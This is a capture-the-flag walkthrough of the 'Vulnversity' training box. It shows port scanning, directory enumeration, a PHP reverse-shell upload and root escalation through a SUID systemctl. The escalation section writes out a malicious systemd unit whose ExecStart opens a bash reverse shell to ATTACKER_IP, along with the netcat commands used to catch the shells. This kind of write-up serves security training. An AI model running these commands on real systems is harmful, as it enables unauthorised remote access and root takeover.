đ§âđVulnversity
Learn about active recon, web app attacks and privilege escalation.
Room Attributes
Value
Subscription Required
False [Free]
Type
Walkthrough
Difficulty
Easy
Tags
Recon, PrivEsc, WebAppSec, Video
Task 1 - Deploy the machine
Deploy the machine
No answer needed
Task 2 - Reconnaissance
There are many nmap "cheatsheets" online that you can use too.
No answer needed
Scan the box, how many ports are open?
rustscan -b 500 -a 10.10.86.148 --range 1-10000Completed Connect Scan at 00:10, 0.15s elapsed (6 total ports)What version of the squid proxy is running on the machine?
rustscan -b 500 -a 10.10.86.148 --range 1-10000 -- -sVPORT STATE SERVICE REASON VERSION
21/tcp open ftp syn-ack vsftpd 3.0.3
22/tcp open ssh syn-ack OpenSSH 7.2p2 Ubuntu 4ubuntu2.7 (Ubuntu Linux; protocol 2.0)
139/tcp open netbios-ssn syn-ack Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn syn-ack Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
3128/tcp open http-proxy syn-ack Squid http proxy 3.5.12
3333/tcp open http syn-ack Apache httpd 2.4.18 ((Ubuntu))How many ports will nmap scan if the flag -p-400 was used?
Using the nmap flag -n what will it not resolve?
HINT: IP to hostname
What is the most likely operating system this machine is running?
HINT: Run nmap with the -O flag
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.7 (Ubuntu Linux; protocol 2.0)
3333/tcp open http Apache httpd 2.4.18 ((Ubuntu))What port is the web server running on?
3333/tcp open http Apache httpd 2.4.18 ((Ubuntu))Its important to ensure you are always doing your reconnaissance thoroughly before progressing. Knowing all open services (which can all be points of exploitation) is very important, don't forget that ports on a higher range might be open so always scan ports after 1000 (even if you leave scanning in the background)
No answer needed
Task 3 - Locating directories using GoBuster
Now lets run GoBuster with a wordlist: gobuster dir -u http://<ip>:3333 -w <word list location>
gobuster dir -u http://TARGET_IP:3333/ -w /usr/share/wordlists/dirb/common.txtNo answer needed
What is the directory that has an upload form page?
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.86.148:3333/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Timeout: 10s
===============================================================
2022/06/26 01:37:30 Starting gobuster in directory enumeration mode
===============================================================
...
/internal (Status: 301) [Size: 322] [--> http://10.10.86.148:3333/internal/]
Task 4 - Compromise the webserver
Try upload a few file types to the server, what common extension seems to be blocked?
To identify which extensions are not blocked, we're going to fuzz the upload form. To do this, we're going to use BurpSuite. If you are unsure to what BurpSuite is, or how to set it up please complete our BurpSuite room first.
No answer needed
Run this attack, what extension is allowed?
Upload your shell and navigate to http://<ip>:3333/internal/uploads/php-reverse-shell.phtml. You should see a connection on your netcat session
No answer needed
What is the name of the user who manages the webserver?
nc -lvnp 4444
listening on [any] 4444 ...
connect to [10.9.12.198] from (UNKNOWN) [10.10.86.148] 45426
Linux vulnuniversity 4.4.0-142-generic #168-Ubuntu SMP Wed Jan 16 21:00:45 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux
21:03:07 up 54 min, 0 users, load average: 0.00, 0.00, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
bash: cannot set terminal process group (1345): Inappropriate ioctl for device
bash: no job control in this shell
www-data@vulnuniversity:/$ www-data@vulnuniversity:/home$ ls
billWhat is the user flag?
HINT: The contents of the file /home/bill/user.txt
www-data@vulnuniversity:/home/bill$ cat user.txt
cat user.txt
(reveal flag below)Task 5 - Privilege Escalation
On the system, search for all SUID files. What file stands out?
HINT: Use the command: find / -user root -perm -4000 -exec ls -ldb {} ;
find / -perm -u=s -type f 2>/dev/null/usr/bin/newuidmap
/usr/bin/chfn
/usr/bin/newgidmap
/usr/bin/sudo
/usr/bin/chsh
/usr/bin/passwd
/usr/bin/pkexec
/usr/bin/newgrp
/usr/bin/gpasswd
/usr/bin/at
/usr/lib/snapd/snap-confine
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/lib/squid/pinger
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
/bin/su
/bin/ntfs-3g
/bin/mount
/bin/ping6
/bin/umount
/bin/systemctl
/bin/ping
/bin/fusermount
/sbin/mount.cifsIts challenge time! We have guided you through this far, are you able to exploit this system further to escalate your privileges and get the final answer? Become root and get the last flag (/root/root.txt)
HINT: /bin/systemctl
Find a directory that www-data can write to:
find / -type f -maxdepth 2 -writable
find / -type d -maxdepth 2 -writablewww-data@vulnuniversity:/tmp$ find / -type d -maxdepth 2 -writable
find / -type d -maxdepth 2 -writable
/run/php
/run/lock
find: '/lost+found': Permission denied
/var/tmp
/var/crash
/tmp
/tmp/.font-unix
/tmp/.ICE-unix
/tmp/.X11-unix
/tmp/.XIM-unix
/tmp/.Test-unix
/dev/mqueue
/dev/shmCreate a root.service file on your attack machine:
[Unit]
Description=rootservice
[Service]
Type=simple
User=root
ExecStart=/bin/bash -c 'bash -i >& /dev/tcp/ATTACKER_IP/9999 0>&1'
[Install]
WantedBy=multi-user.target
Get the target to listen for a connection to receive and write the root.service file to /tmp:
www-data@vulnuniversity:$ cd /tmp
www-data@vulnuniversity:/tmp$ nc -vl 6969 > root.serviceSend the file from your attack machine to the target:
kali@kali î° ~/Documents/THM/vulnversity î° nc -n TARGET_IP 6969 < root.serviceThen start a new listener to capture the root reverse shell:
kali@kali î° ~/Documents/THM/vulnversity î° nc -lvnp 9999Execute the payload:
www-data@vulnuniversity:/tmp$ /bin/systemctl enable /tmp/root.service
Created symlink from /etc/systemd/system/multi-user.target.wants/root.service to /tmp/root.service.
Created symlink from /etc/systemd/system/root.service to /tmp/root.service.www-data@vulnuniversity:/tmp$ /bin/systemctl start rootCatch the root reverse shell on your attack machine:
kali@kali î° ~/Documents/THM/vulnversity î° nc -lvnp 9999
listening on [any] 9999 ...
connect to [10.9.12.198] from (UNKNOWN) [10.10.86.148] 45598
bash: cannot set terminal process group (2162): Inappropriate ioctl for device
bash: no job control in this shell
root@vulnuniversity:/# whoami
rootRead the root flag:
root@vulnuniversity:~# cat /root/root.txt
cat root.txt
(reveal flag below)Last updated